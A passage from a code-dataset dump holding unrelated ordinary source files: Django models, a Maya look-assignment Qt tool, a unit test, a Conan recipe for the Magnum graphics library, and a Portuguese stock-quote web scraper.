Music'),(Dance,'Dancing'),(Cplusplus,'C++'),(C,'C'),(JAVA,'JAVA'),(Csharp,'C#'),(NET,'.NET'),(PYTHON,'PYTHON'),(JS,'JavaScript'),(HTML,'HTML'),(CSS,'CSS'),(DBMS,'Database'),(NETWORK,'Networking'),(CLOUD,'Cloud'),(AND,'Android'),(ML,'ML'),(AI,'AI'),(DATASCIENCE,'Data science'))\n Category=models.CharField(choices=cat_choice,max_length=50)\n Difficulty_level=models.PositiveSmallIntegerField()\n Question=models.CharField(max_length=256)\n Answer=models.CharField(max_length=512)\n\n def __str__(self):\n return self.Question\nclass result_user(models.Model):\n user_result=models.OneToOneField(User,on_delete=models.CASCADE)\n marks=models.CharField(max_length=2048)\n date_of_exam= models.DateTimeField(auto_now_add=True)\n quest_list=models.CharField(max_length=2048,default=\"\")\n exam_name=models.CharField(max_length=256)\n def __str__(self):\n return self.user_result.username\nclass company_post(models.Model):\n Company_name=models.CharField(max_length=256)\n Position=models.CharField(max_length=256)\n Difficulty_level=models.PositiveIntegerField()\n salary_in_rupees=models.PositiveIntegerField()\n min_experience_in_years=models.PositiveIntegerField()\n Discreption=models.CharField(max_length=512)\n def __str__(self):\n return self.Company_name\nclass company_marks(models.Model):\n user_name=models.ForeignKey(result_user,on_delete=models.CASCADE)\n Company_name=models.ForeignKey(company_post,on_delete=models.CASCADE)\n cm_marks=models.PositiveSmallIntegerField()\n cm_position=models.CharField(max_length=256)\n def __str__(self):\n return 
self.user_name.user_result.username\n","sub_path":"InterviewBot/Front/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302315088","text":"import json\nimport sys\nimport logging\n\nfrom avalon.tools import lib as tools_lib\nfrom avalon.vendor.Qt import QtWidgets, QtCore, QtGui\n\nfrom . import commands, models, views\n\nmodule = sys.modules[__name__]\nmodule.window = None\n\n# Todo: implement load_queue logic and link store_queue to button\n\n\nclass App(QtWidgets.QWidget):\n\n def __init__(self, parent=None):\n QtWidgets.QWidget.__init__(self, parent=parent)\n\n self._noderole = QtCore.Qt.UserRole + 1\n\n self.log = logging.getLogger(__name__)\n\n self.setObjectName(\"lookManager\")\n self.setWindowTitle(\"Look Manager 1.1\")\n self.resize(900, 530)\n\n self.apply_button = None\n self.refresh_button = None\n self.random_button = None\n self.list_view = None\n\n self.setup_ui()\n\n self.setup_connections()\n\n self.refresh()\n\n def refresh(self):\n \"\"\"Refresh the content\"\"\"\n\n # Get all containers and information\n items = commands.get_selected_assets()\n self.container_model.clear()\n if items:\n # Add all found containers to the models for display\n self.container_model.add_items(items)\n\n def setup_ui(self):\n \"\"\"Build the UI\"\"\"\n\n main_layout = QtWidgets.QHBoxLayout()\n splitter = QtWidgets.QSplitter()\n\n # Container overview\n container_widget = QtWidgets.QWidget()\n container_title = self._create_label(\"Assets\")\n container_layout = QtWidgets.QVBoxLayout()\n\n container_model = models.ContainerModel()\n container_view = views.View()\n container_view.setModel(container_model)\n container_view.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n\n from_selection_btn = QtWidgets.QPushButton(\"Get Looks From Selection\")\n from_all_asset_btn = QtWidgets.QPushButton(\"Get Looks From All Assets\")\n\n container_layout.addWidget(container_title)\n container_layout.addWidget(from_selection_btn)\n container_layout.addWidget(from_all_asset_btn)\n container_layout.addWidget(container_view)\n\n # Add container view\n container_widget.setLayout(container_layout)\n splitter.addWidget(container_widget)\n\n # look manager layout\n look_views_widget = QtWidgets.QWidget()\n look_views_layout = QtWidgets.QVBoxLayout()\n look_views_layout.setSpacing(10)\n\n # Looks from database\n documents_title = self._create_label(\"Available looks\")\n documents_title.setAlignment(QtCore.Qt.AlignCenter)\n document_model = models.FlatModel()\n document_view = views.View()\n document_view.setToolTip(\"Use right mouse button menu for direct actions\")\n document_view.setModel(document_model)\n document_view.setMinimumHeight(230)\n\n look_views_layout.addWidget(documents_title)\n look_views_layout.addWidget(document_view)\n\n # Turn off queue at start, show this widget\n queue_off_message = QtWidgets.QLabel(\n \"Queue is empty, add items to the queue to active it\")\n queue_off_message.setAlignment(QtCore.Qt.AlignCenter)\n queue_off_message.setStyleSheet(\"font-size: 12px;\")\n\n # Queue view\n queue_title = self._create_label(\"Queue\")\n queue_title.setAlignment(QtCore.Qt.AlignCenter)\n queue_model = models.LookQueueModel()\n queue_view = views.View()\n queue_view.setModel(queue_model)\n\n queue_widgets = QtWidgets.QStackedWidget()\n queue_widgets.addWidget(queue_off_message)\n queue_widgets.addWidget(queue_view)\n\n look_views_layout.addWidget(queue_title)\n 
look_views_layout.addWidget(queue_widgets)\n\n # Method buttons\n method_buttons_layout = QtWidgets.QHBoxLayout()\n assign_to_selected_btn = QtWidgets.QPushButton(\"Process Selected Queue\")\n assign_to_all_btn = QtWidgets.QPushButton(\"Process Queued Looks\")\n remove_unused_btn = QtWidgets.QPushButton(\"Remove Unused Looks\")\n method_buttons_layout.addWidget(assign_to_selected_btn)\n method_buttons_layout.addWidget(assign_to_all_btn)\n method_buttons_layout.addWidget(remove_unused_btn)\n\n load_save_buttons_layout = QtWidgets.QHBoxLayout()\n load_queue_btn = QtWidgets.QPushButton(\"Load Queue from File\")\n save_queue_btn = QtWidgets.QPushButton(\"Save Queue to File\")\n load_save_buttons_layout.addWidget(load_queue_btn)\n load_save_buttons_layout.addWidget(save_queue_btn)\n\n look_views_layout.addLayout(method_buttons_layout)\n look_views_layout.addLayout(load_save_buttons_layout)\n look_views_widget.setLayout(look_views_layout)\n splitter.addWidget(look_views_widget)\n\n main_layout.addWidget(splitter)\n\n container_view.setColumnWidth(0, 200) # subset\n document_view.setColumnWidth(0, 200)\n queue_view.setColumnWidth(0, 200)\n\n self.from_selection_btn = from_selection_btn\n self.from_all_asset_btn = from_all_asset_btn\n\n self.assign_to_selected_btn = assign_to_selected_btn\n self.assign_to_all_btn = assign_to_all_btn\n self.remove_unused_btn = remove_unused_btn\n\n self.container_model = container_model\n self.container_view = container_view\n\n self.document_model = document_model\n self.document_view = document_view\n\n self.queue_widgets = queue_widgets\n self.queue_model = queue_model\n self.queue_view = queue_view\n\n self.save_queue = save_queue_btn\n self.load_queue = load_queue_btn\n\n self.setLayout(main_layout)\n\n def setup_connections(self):\n \"\"\"Connect interactive widgets with actions\"\"\"\n\n container_selection_model = self.container_view.selectionModel()\n container_selection_model.selectionChanged.connect(\n self._on_container_selection_changed)\n\n # Buttons\n self.from_selection_btn.clicked.connect(self.refresh)\n self.from_all_asset_btn.clicked.connect(self._get_all_assets)\n self.assign_to_all_btn.clicked.connect(self._apply_from_queue)\n self.assign_to_selected_btn.clicked.connect(self._apply_from_selection)\n self.remove_unused_btn.clicked.connect(commands.remove_unused_looks)\n\n self.save_queue.clicked.connect(self._on_save_queue)\n self.load_queue.clicked.connect(self._on_load_queue)\n\n # Set menu triggers\n self.document_view.customContextMenuRequested.connect(\n self.build_document_menu)\n\n self.queue_view.customContextMenuRequested.connect(\n self.build_queue_menu)\n\n def build_document_menu(self, pos):\n \"\"\"Build RMB menu for document view\"\"\"\n\n active = self.document_view.currentIndex() # index under mouse\n active = active.sibling(active.row(), 0) # get first column\n globalpos = self.document_view.viewport().mapToGlobal(pos)\n\n if not active.isValid():\n return\n\n menu = QtWidgets.QMenu(self.document_view)\n\n # Direct assignment\n apply_action = QtWidgets.QAction(menu, text=\"Assign Directly\")\n apply_action.triggered.connect(self._apply_from_selection)\n\n queue_action = QtWidgets.QAction(menu, text=\"Queue Assignment\")\n queue_action.triggered.connect(self._add_queue_items)\n\n menu.addAction(apply_action)\n menu.addAction(queue_action)\n\n menu.exec_(globalpos)\n\n def build_queue_menu(self, pos):\n\n active = self.queue_view.currentIndex() # index under mouse\n active = active.sibling(active.row(), 0) # get first column\n 
globalpos = self.queue_view.viewport().mapToGlobal(pos)\n\n menu = QtWidgets.QMenu(self.document_view)\n\n if active.isValid():\n apply_action = QtWidgets.QAction(menu, text=\"Apply looks\")\n apply_action.triggered.connect(self._apply_from_queue)\n\n rem_action = QtWidgets.QAction(menu, text=\"Remove Selected Queue\")\n rem_action.triggered.connect(self._remove_selected_queued)\n\n menu.addAction(apply_action)\n menu.addAction(rem_action)\n menu.addSeparator()\n\n save_action = QtWidgets.QAction(menu, text=\"Save Queue\")\n save_action.triggered.connect(self._on_save_queue)\n\n clear_action = QtWidgets.QAction(menu, text=\"Clear Queue\")\n clear_action.triggered.connect(self._clear_queue)\n\n menu.addAction(save_action)\n menu.addAction(clear_action)\n\n menu.exec_(globalpos)\n\n def _on_save_queue(self):\n \"\"\"Store the created queue in a json file\"\"\"\n\n _dir = commands.get_workfolder()\n fdialog = QtWidgets.QFileDialog()\n filepath, ext = fdialog.getSaveFileName(self,\n \"Save File\",\n _dir,\n \"*.json\")\n if not filepath:\n return\n\n assert ext == \"*.json\", \"Wrong file type\"\n\n queued_items = self._get_queued_items()\n if not queued_items:\n self.log.error(\"No queued items to store\")\n return\n\n queue_data = commands.create_queue_out_data(queued_items)\n commands.save_to_json(filepath, {\"queue\": queue_data})\n\n def _on_load_queue(self):\n\n _dir = commands.get_workfolder()\n fdialog = QtWidgets.QFileDialog()\n filepath, ext = fdialog.getOpenFileName(self,\n \"Open File\",\n _dir,\n \"*.json\")\n\n with open(filepath, \"r\") as fp:\n queue_data = json.load(fp)\n\n if \"queue\" not in queue_data:\n raise RuntimeError(\"Invalid queue data\")\n\n valid_items = []\n items = commands.create_queue_in_data(queue_data[\"queue\"])\n for item in items:\n if self._validate_queue_entry(item):\n valid_items.append(item)\n\n self.log.info(\"Found %d new item(s)\" % len(valid_items))\n\n if self.queue_widgets.currentIndex() != 1:\n self.queue_widgets.setCurrentIndex(1)\n\n self.queue_model.add_items(valid_items)\n\n def _create_label(self, text):\n \"\"\"Lazy function to create a label\"\"\"\n\n title = QtWidgets.QLabel(text)\n title.setAlignment(QtCore.Qt.AlignCenter)\n title.setStyleSheet(\"font-weight: bold; font-size: 12px\")\n\n return title\n\n def _on_container_selection_changed(self):\n\n all_documents = []\n\n indices = self.container_view.get_indices()\n for idx in indices:\n data = idx.data(self._noderole)\n if data is None:\n continue\n\n _id = data.get(\"_id\", None)\n if not _id:\n continue\n\n all_documents.extend(data.get(\"looks\", []))\n\n self.document_model.clear()\n self.document_model.add_items(all_documents)\n\n def _get_all_assets(self):\n\n items = commands.get_all_assets()\n self.container_model.clear()\n self.container_view.setVisible(False)\n self.container_model.add_items(items)\n self.container_view.setVisible(True)\n\n def _create_queue_items(self):\n \"\"\"Create a queue item based on the selection\"\"\"\n\n documents = [document.data(self._noderole) for document in\n self.document_view.get_indices()]\n assert len(documents) > 0, \"Please select a look\"\n containers = [container.data(self._noderole) for container in\n self.container_view.get_indices()]\n\n items = []\n for data in containers:\n\n asset_name = data[\"asset\"][\"name\"]\n for doc in documents:\n version = doc[\"version\"].get(asset_name, None)\n if version is None:\n continue\n items.append({\"asset\": data[\"objectName\"],\n \"subset\": doc[\"subset\"],\n \"version\": 
version[\"name\"],\n \"document\": version})\n\n return items\n\n def _add_queue_items(self):\n\n if self.queue_widgets.currentIndex() != 1:\n self.queue_widgets.setCurrentIndex(1)\n\n items = self._create_queue_items()\n\n validated = []\n for item in items:\n valid = self._validate_queue_entry(item)\n if valid:\n validated.append(item)\n\n self.queue_model.add_items(validated)\n\n def _validate_queue_entry(self, entry):\n \"\"\"If an entry already exists return false\"\"\"\n\n parent = QtCore.QModelIndex()\n for row in range(self.queue_model.rowCount(parent)):\n idx = self.queue_model.index(row, 0, parent)\n data = idx.data(self._noderole)\n if entry == data:\n self.log.info(\"Already in queue\")\n return False\n\n return True\n\n def _get_queued_items(self):\n \"\"\"Get all queued items in form of dictionaries\n Returns:\n list\n \"\"\"\n\n items = []\n\n parent = QtCore.QModelIndex()\n for row in range(self.queue_model.rowCount(parent)):\n idx = self.queue_model.index(row, 0, parent)\n data = idx.data(self._noderole)\n items.append(data)\n\n return items\n\n def _remove_selected_queued(self):\n \"\"\"Remove selected item(s) from the queue\"\"\"\n\n model_index = QtCore.QModelIndex()\n\n active = self.queue_view.currentIndex()\n active_row = active.row()\n\n items = []\n for row in range(self.queue_model.rowCount(model_index)):\n idx = self.queue_model.index(row, 0, model_index)\n index_data = idx.data(self._noderole)\n items.append(index_data)\n\n items.pop(active_row)\n\n self.queue_model.clear()\n if not items:\n self.queue_widgets.setCurrentIndex(0)\n return\n\n self.queue_model.add_items(items)\n\n def _clear_queue(self):\n self.queue_widgets.setCurrentIndex(0)\n self.queue_model.clear()\n\n def _apply_from_selection(self):\n items = self._create_queue_items()\n for item in items:\n commands.process_queued_item(item)\n\n def _apply_from_queue(self):\n \"\"\"Apply the look based on the queued looks\"\"\"\n\n # Get queued items\n items = self._get_queued_items()\n if not items:\n self.log.error(\"No look selected\")\n return\n for item in items:\n commands.process_queued_item(item)\n\n\ndef show(root=None, debug=False, parent=None):\n \"\"\"Display Loader GUI\n\n Arguments:\n debug (bool, optional): Run loader in debug-mode,\n defaults to False\n\n \"\"\"\n\n try:\n module.window.close()\n del module.window\n except (RuntimeError, AttributeError):\n pass\n\n with tools_lib.application():\n window = App(parent)\n window.show()\n\n module.window = window\n","sub_path":"mayalookassigner/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"357177265","text":"import os\nimport sys\nimport unittest\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom workbench_utils import execute_bootstrap_script\n\n\nclass TestExecuteBootstrapScript(unittest.TestCase):\n\n def setUp(self):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n self.script_path = os.path.join(dir_path, 'assets', 'execute_bootstrap_script_test', 'script.py')\n self.config_file_path = os.path.join(dir_path, 'assets', 'execute_bootstrap_script_test', 'config.yml')\n\n def test_python_script(self):\n output, return_code = execute_bootstrap_script(self.script_path, self.config_file_path)\n self.assertEqual(output.strip(), b'Hello')\n\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"tests/ExecuteBootstrapScriptTest.py","file_name":"ExecuteBootstrapScriptTest.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"144556483","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom conan import ConanFile\nfrom conan.tools.cmake import CMake, CMakeToolchain, cmake_layout, CMakeDeps\nfrom conan.tools.scm import Git\nfrom conan.tools.files import load, update_conandata, copy, collect_libs, get, replace_in_file\nfrom conan.tools.microsoft.visual import check_min_vs\nfrom conan.tools.system.package_manager import Apt\nimport os\n\n\ndef sort_libs(correct_order, libs, lib_suffix='', reverse_result=False):\n # Add suffix for correct string matching\n correct_order[:] = [s.__add__(lib_suffix) for s in correct_order]\n\n result = []\n for expectedLib in correct_order:\n for lib in libs:\n if expectedLib == lib:\n result.append(lib)\n\n if reverse_result:\n # Linking happens in reversed order\n result.reverse()\n\n return result\n\n\nclass LibnameConan(ConanFile):\n name = \"magnum\"\n version = \"2020.06\"\n description = \"Magnum — Lightweight and modular C++11/C++14 \\\n graphics middleware for games and data visualization\"\n # topics can get used for searches, GitHub topics, Bintray tags etc. Add here keywords about the library\n topics = (\"conan\", \"corrade\", \"graphics\", \"rendering\", \"3d\", \"2d\", \"opengl\")\n url = \"https://github.com/TUM-CONAN/conan-magnum\"\n homepage = \"https://magnum.graphics\"\n author = \"ulrich eck (forked on github)\"\n license = \"MIT\"\n exports = [\"LICENSE.md\"]\n exports_sources = [\"CMakeLists.txt\"]\n\n # Options may need to change depending on the packaged library.\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False], \n \"fPIC\": [True, False],\n \"build_deprecated\": [True, False],\n \"build_plugins_static\": [True, False],\n \"target_gl\": [True, False],\n \"target_gles\": [True, False],\n \"with_anyaudioimporter\": [True, False],\n \"with_anyimageconverter\": [True, False],\n \"with_anyimageimporter\": [True, False],\n \"with_anysceneimporter\": [True, False],\n \"with_audio\": [True, False],\n \"with_debugtools\": [True, False],\n \"with_distancefieldconverter\": [True, False],\n \"with_eglcontext\": [True, False],\n \"with_fontconverter\": [True, False],\n \"with_glfwapplication\": [True, False],\n \"with_glxapplication\": [True, False],\n \"with_glxcontext\": [True, False],\n \"with_wglcontext\": [True, False],\n \"with_gl_info\": [True, False],\n \"with_imageconverter\": [True, False],\n \"with_magnumfont\": [True, False],\n \"with_magnumfontconverter\": [True, False],\n \"with_meshtools\": [True, False],\n \"with_objimporter\": [True, False],\n \"with_opengltester\": [True, False],\n \"with_primitives\": [True, False],\n \"with_scenegraph\": [True, False],\n \"with_sdl2application\": [True, False],\n \"with_shaders\": [True, False],\n \"with_text\": [True, False],\n \"with_tgaimageconverter\": [True, False],\n \"with_tgaimporter\": [True, False],\n \"with_vk\": [True, False],\n \"with_wavaudioimporter\": [True, False],\n \"with_windowlesswglapplication\": [True, False],\n \"with_windowlesseglapplication\": [True, False],\n \"with_windowlesscglapplication\": [True, False],\n \"with_windowlessglxapplication\": [True, False],\n \"with_xeglapplication\": [True, False],\n }\n\n default_options = {\n \"shared\": False, \n \"fPIC\": True,\n 
\"build_deprecated\": False,\n \"build_plugins_static\": False,\n \"target_gl\": True,\n \"target_gles\": False,\n \"with_anyaudioimporter\": False,\n \"with_anyimageconverter\": False,\n \"with_anyimageimporter\": False,\n \"with_anysceneimporter\": False,\n \"with_audio\": False,\n \"with_debugtools\": True,\n \"with_distancefieldconverter\": False,\n \"with_eglcontext\": False,\n \"with_fontconverter\": False,\n \"with_glfwapplication\": True,\n \"with_glxapplication\": False,\n \"with_glxcontext\": False,\n \"with_wglcontext\": False,\n \"with_gl_info\": False,\n \"with_imageconverter\": False,\n \"with_magnumfont\": False,\n \"with_magnumfontconverter\": False,\n \"with_meshtools\": True,\n \"with_objimporter\": False,\n \"with_opengltester\": False,\n \"with_primitives\": True,\n \"with_scenegraph\": True,\n \"with_sdl2application\": False,\n \"with_shaders\": True,\n \"with_text\": True,\n \"with_tgaimageconverter\": False,\n \"with_tgaimporter\": False,\n \"with_vk\": False,\n \"with_wavaudioimporter\": False,\n \"with_windowlesswglapplication\": False,\n \"with_windowlesseglapplication\": False,\n \"with_windowlesscglapplication\": False,\n \"with_windowlessglxapplication\": False,\n \"with_xeglapplication\": False,\n \"corrade/*:build_deprecated\": True,\n }\n\n def system_requirements(self):\n apt = Apt(self)\n packages = []\n if self.options.target_gl:\n packages.append(\"libgl1-mesa-dev\")\n if self.options.target_gles:\n packages.append(\"libgles1-mesa-dev\")\n missing = apt.check(packages)\n if missing:\n self.output.error(\"Warning: Missing system packages: {}\".format(missing))\n\n def config_options(self):\n if self.settings.os == 'Windows':\n del self.options.fPIC\n\n def configure(self):\n self.options['corrade']['build_deprecated'] = self.options.build_deprecated\n\n # To fix issue with resource management, see here:\n # https://github.com/mosra/magnum/issues/304#issuecomment-451768389\n if self.options.shared:\n self.options['corrade']['shared'] = True\n\n def requirements(self):\n self.requires(\"corrade/2020.06@camposs/stable\")\n self.requires(\"opengl/system\")\n if self.options.with_sdl2application:\n self.requires(\"sdl/2.26.1\")\n if self.options.with_glfwapplication:\n self.requires(\"glfw/3.3.8\")\n\n def validate(self):\n if self.settings.os == \"Windows\":\n check_min_vs(self, \"141\")\n\n def export(self):\n update_conandata(self, {\"sources\": {\n \"commit\": \"v{}\".format(self.version),\n \"url\": \"https://github.com/mosra/magnum.git\"\n }}\n )\n\n def source(self):\n git = Git(self)\n sources = self.conan_data[\"sources\"]\n git.clone(url=sources[\"url\"], target=self.source_folder)\n git.checkout(commit=sources[\"commit\"])\n replace_in_file(self, os.path.join(self.source_folder, \"CMakeLists.txt\"),\n \"find_package(Corrade REQUIRED Utility)\",\n \"cmake_policy(SET CMP0074 NEW)\\nfind_package(Corrade REQUIRED Utility)\")\n\n def generate(self):\n tc = CMakeToolchain(self)\n\n def add_cmake_option(option, value):\n var_name = \"{}\".format(option).upper()\n value_str = \"{}\".format(value)\n var_value = \"ON\" if value_str == 'True' else \"OFF\" if value_str == 'False' else value_str \n tc.variables[var_name] = var_value\n\n for option, value in self.options.items():\n add_cmake_option(option, value)\n\n # Corrade uses suffix on the resulting 'lib'-folder when running cmake.install()\n # Set it explicitly to empty, else Corrade might set it implicitly (eg. 
to \"64\")\n add_cmake_option(\"LIB_SUFFIX\", \"\")\n\n add_cmake_option(\"BUILD_STATIC\", not self.options.shared)\n add_cmake_option(\"BUILD_STATIC_PIC\", not self.options.shared and self.options.get_safe(\"fPIC\"))\n corrade_root = self.dependencies[\"corrade\"].package_folder\n # on windows change to unix style path, as are all other paths\n if self.settings.os == 'Windows':\n corrade_root = corrade_root.replace('\\\\', '/') \n tc.variables[\"Corrade_ROOT\"] = corrade_root\n\n tc.generate()\n\n deps = CMakeDeps(self)\n deps.set_property(\"corrade\", \"cmake_find_mode\", \"none\")\n deps.set_property(\"glfw\", \"cmake_find_mode\", \"none\")\n deps.generate()\n\n def layout(self):\n cmake_layout(self, src_folder=\"source_subfolder\")\n\n def build(self):\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n\n def package(self):\n copy(self, pattern=\"LICENSE\", dst=\"licenses\", src=self.source_folder)\n cmake = CMake(self)\n cmake.install()\n\n def package_info(self):\n # See dependency order here: https://doc.magnum.graphics/magnum/custom-buildsystems.html\n all_libs = [\n #1\n \"Magnum\",\n \"MagnumAnimation\",\n \"MagnumMath\",\n #2\n \"MagnumAudio\",\n \"MagnumGL\",\n \"MagnumSceneGraph\",\n \"MagnumTrade\",\n \"MagnumVk\",\n #3\n \"MagnumMeshTools\",\n \"MagnumPrimitives\",\n \"MagnumShaders\",\n \"MagnumTextureTools\",\n \"MagnumGlfwApplication\",\n \"MagnumXEglApplication\",\n \"MagnumWindowlessEglApplication\",\n \"MagnumGlxApplication\" ,\n \"MagnumWindowlessGlxApplication\",\n \"MagnumSdl2Application\",\n \"MagnumWindowlessSdl2Application\",\n \"MagnumWindowlessWglApplication\",\n \"MagnumWindowlessCglApplication\",\n #4\n \"MagnumDebugTools\",\n \"MagnumOpenGLTester\",\n \"MagnumText\",\n ]\n \n # Sort all built libs according to above, and reverse result for correct link order\n suffix = '-d' if self.settings.build_type == \"Debug\" else ''\n built_libs = collect_libs(self)\n self.cpp_info.libs = sort_libs(correct_order=all_libs, libs=built_libs, lib_suffix=suffix, reverse_result=True)\n\n if self.settings.os == \"Windows\":\n if self.settings.compiler == \"msvc\":\n if not self.options.shared:\n self.cpp_info.system_libs.append(\"OpenGL32.lib\")\n else:\n self.cpp_info.system_libs.append(\"opengl32\")\n else:\n if self.settings.os == \"Macos\":\n self.cpp_info.exelinkflags.append(\"-framework OpenGL\")\n elif not self.options.shared:\n self.cpp_info.system_libs.append(\"GL\")\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":10330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"383843848","text":"#----------------------------------------------\n# Programa DESAFIO SJC para Semantix - Arquivo principal\n# Programador: Vitor Zago\n# Data: 08/04/2020\n# Versão 1.2\n#----------------------------------------------\n\nimport datetime\nimport time\nimport csv\nimport os\nimport requests\nimport InterpretacaoHTMLBolsa as ParseHTMLBolsa\nimport InterpretacaoHTMLMoeda as ParseHTMLMoeda\nimport sys\nimport RepositorioDado\n\n# Parâmetros Gerais\n# nome do arquivo com os endereços para importação das ações\narquivoListaUrlCotacao = 'Config/listaUrlCotacaoBolsa.csv'\narquivoListaUrlCotacaoMoeda = 'Config/listaUrlCotacaoMoeda.csv'\narquivoBaseDado = 'BancoDado.db'\n\nsubPastaArquivoConversao = 'Arquivo'\nintervaloRequisicao = 2 * 60 # 2 minutos - Tempo em segundos\n\n# Enganar o site fingindo a requisição ser do Mozila Firefox\n# Sem isso, o servidor recusava a requisição\nuser_agent = 
{'User-agent': 'Mozilla/5.0'}\n\n# Definition of the standard quote URL class\nclass UrlCotacao:\n    def __init__(self, _bolsa, _url, _moeda):\n        self.bolsa = _bolsa # stock exchange name\n        self.url = _url\n        self.moeda = _moeda\n        \n        # holds the list of quotes\n        self.listaCotacao = None\n        \n    def __repr__(self):\n        return 'Url: ' + self.url + ' Moeda: ' + self.moeda + ' Bolsa: ' + self.bolsa\n    \n    def redefinir(self):\n        self.listaCotacao = None\n    \n\nclass UrlCotacaoMoeda:\n    def __init__(self, _mOrigem, _mDestino, _url):\n        self.moedaOrigem = _mOrigem\n        self.moedaDestino = _mDestino\n        self.url = _url\n        \n        # the corresponding exchange-rate quote\n        self.cotacaoMoeda = None\n        \n    def __repr__(self):\n        return 'Url: ' + self.url + ' Moeda Origem: ' + self.moedaOrigem + ' Moeda Destino: ' + self.moedaDestino\n    \n    def redefinir(self):\n        self.cotacaoMoeda = None\n\n# Check whether the subfolder exists and create it if necessary\ndef verificarSubpasta(nomeCaminho):\n    if not os.path.exists(nomeCaminho):\n        os.mkdir(nomeCaminho)\n\n# --------------------------------------- \n# Function that writes converted stock quotes\n# --------------------------------------- \ndef gravarCotacaoConvertido(listaCotacaoConvertido, nomeArquivo):\n    \n    verificarSubpasta(subPastaArquivoConversao)\n    \n    caminhoArquivoSaida = os.path.join(subPastaArquivoConversao, nomeArquivo)\n    \n    with open(caminhoArquivoSaida, 'w', newline='') as csvfile:\n        gravadorCSV = csv.writer(csvfile, delimiter=';', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n        \n        # header\n        gravadorCSV.writerow(['name','last_rs','high_rs','low_rs','last_usd','high_usd', 'low_usd','chg','chg_perc','vol','time'])\n        \n        # data rows\n        for cotacao in listaCotacaoConvertido:\n            gravadorCSV.writerow([cotacao.nome, cotacao.last_conv, cotacao.high_conv, cotacao.low_conv, cotacao.last, cotacao.high, cotacao.low, cotacao.chg, cotacao.chgP, cotacao.vol, cotacao.time])\n\n# --------------------------------------- \n# Function that requests an internet address\n# --------------------------------------- \ndef requisitarEndereco(enderecoUrl, caminhoSaida = ''):\n    \n    # fetch the information from the site\n    req = requests.get(enderecoUrl, headers = user_agent)\n    print(\"Url: \", req.url, \" Código retorno:\", req.status_code)\n    \n    if caminhoSaida is not None and len(caminhoSaida) > 0:\n        with open(caminhoSaida,'wb') as gravadorArquivo:\n            gravadorArquivo.write(req.content)\n        print('Arquivo salvo em ', caminhoSaida)\n\n    return req\n\n# --------------------------------------- \n# Function that imports stock exchange content\n# --------------------------------------- \ndef importarConteudoSiteBolsa(urlCotacao, caminhoSaida = ''):\n    \n    # request the URL\n    req = requisitarEndereco(urlCotacao.url, caminhoSaida)\n    \n    # create quote/stock objects\n    listaCotacaoParcial = ParseHTMLBolsa.getListaCotacaoPorConteudo(req.text)\n    for cotacao in listaCotacaoParcial:\n        cotacao.moeda = urlCotacao.moeda\n    print('Encontrado', len(listaCotacaoParcial), 'cotações.')\n    urlCotacao.listaCotacao = listaCotacaoParcial \n    \n    return listaCotacaoParcial\n    \n# --------------------------------------- \n# Function that imports currency content\n# --------------------------------------- \ndef importarConteudoSiteMoeda(urlCotacaoMoeda, caminhoSaida = ''):\n    # request the URL\n    req = requisitarEndereco(urlCotacaoMoeda.url, caminhoSaida)\n    \n    # create the currency quote object\n    cotacaoMoeda = ParseHTMLMoeda.getCotacaoMoedaPorConteudo(req.text)\n    urlCotacaoMoeda.cotacaoMoeda = cotacaoMoeda\n\n    return cotacaoMoeda\n    \n# 
--------------------------------------- \n# Function that converts stock exchange quotes\n# --------------------------------------- \ndef converterCotacao(urlCotacao, moedaDestino, nomeArquivoConvertido = ''):\n    print('Necessário conversão:')\n    mOrigem = urlCotacao.moeda\n    mDestino = moedaDestino\n\n    cotacaoConversao = next( (x for x in iter(listaUrlCotacaoMoeda) if x.moedaOrigem == mOrigem and x.moedaDestino == mDestino), None)\n    if cotacaoConversao is None:\n        print('Não convertido. Não definido cotação para conversão de', mOrigem, 'para', mDestino, '!')\n    else:\n        fatorConversao = cotacaoConversao.cotacaoMoeda.cotacao\n        print('Fator de conversão:', fatorConversao)\n        for cotacaoBolsa in urlCotacao.listaCotacao:\n            cotacaoBolsa.converterMoeda('R$', fatorConversao)\n        \n        if nomeArquivoConvertido is not None and nomeArquivoConvertido != '':\n            gravarCotacaoConvertido(urlCotacao.listaCotacao, nomeArquivoConvertido)\n\n#------------------------------------------\n# MAIN - main loop\n#------------------------------------------\n\n# prepare the URLs to fetch\nlistaUrlCotacao = []\nlistaUrlCotacaoMoeda = []\nwith open(arquivoListaUrlCotacao, 'r') as arquivoCsv:\n    leitorCSV = csv.reader(arquivoCsv, delimiter=';', quotechar='\"')\n    for linha in leitorCSV:\n        if len(linha) >= 3:\n            urlCotacao = UrlCotacao(linha[0], linha[1], linha[2]) # exchange name;URL;currency\n            listaUrlCotacao.append(urlCotacao)\n\nwith open(arquivoListaUrlCotacaoMoeda, 'r') as arquivoCsv:\n    leitorCSV = csv.reader(arquivoCsv, delimiter=';', quotechar='\"')\n    for linha in leitorCSV:\n        if len(linha) >= 3:\n            urlCotacaoMoeda = UrlCotacaoMoeda(linha[0], linha[1], linha[2]) # source currency; target currency; URL\n            listaUrlCotacaoMoeda.append(urlCotacaoMoeda)\n\nif len(listaUrlCotacao) == 0:\n    raise Exception('Nenhuma Url de cotação definida.')\n\n# main loop\nrep = RepositorioDado.Repositorio(arquivoBaseDado)\nnumRequisicao = 0 \nprint('Iniciando LOOP principal')\nwhile True:\n    try:\n        # reset the stock quote lists\n        for enderecoUrl in listaUrlCotacao:\n            enderecoUrl.redefinir()\n        \n        # reset the currency conversions\n        for enderecoUrl in listaUrlCotacaoMoeda:\n            